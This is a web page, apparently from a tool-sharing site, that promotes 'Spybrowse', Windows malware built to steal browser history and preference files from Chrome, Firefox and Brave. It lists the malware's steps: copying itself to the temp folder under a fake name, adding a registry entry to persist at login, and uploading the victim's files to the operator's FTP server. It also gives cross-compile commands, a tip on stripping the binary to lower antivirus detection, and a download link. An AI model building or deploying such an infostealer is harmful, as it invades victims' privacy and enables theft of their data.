Spybrowse – Code Developed To Steal Certain Browser Config Files (History, Preferences, Etc)

spybrowse 4 img4

Be sure to change the ftp variables throughout the code, these variables contain the username, password, & IP address of the FTP server which receives the files.
This code will do the following:

  1. Copy itself into the %TMP% directory & name itself ursakta.exe
  2. Add a registry entry to execute itself each time the user logs in
  3. Verify which browser the user is using (Chrome, Firefox or Brave)
  4. Search for files within the Chrome, Firefox, or Brave browser directories
  5. Create a directory on our FTP server then send the files in the browser’s directory to the FTP server

Cross Compiling with MingW on Linux
Install command with Apt:

  • sudo apt-get install mingw-w64

64-bit:

  • x86_64-w64-mingw32-gcc *input file* -o *output file* -lwininet -lversion

32-bit:

  • i686-w64-mingw32-gcc *input file* -o *output file* -lwininet -lversion

From Victim’s Perspective:
Registry entry:

spybrowse 1 img1

File activity:

spybrowse 2 img2

spybrowse 3 img3

FTP connection:

spybrowse 4 img4 1

Detection Rate:
This detection rate is after stripping the executable with strip --strip-all *filename.c*

spybrowse 5 img5

Download Spybrowse

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Patreon

Original Source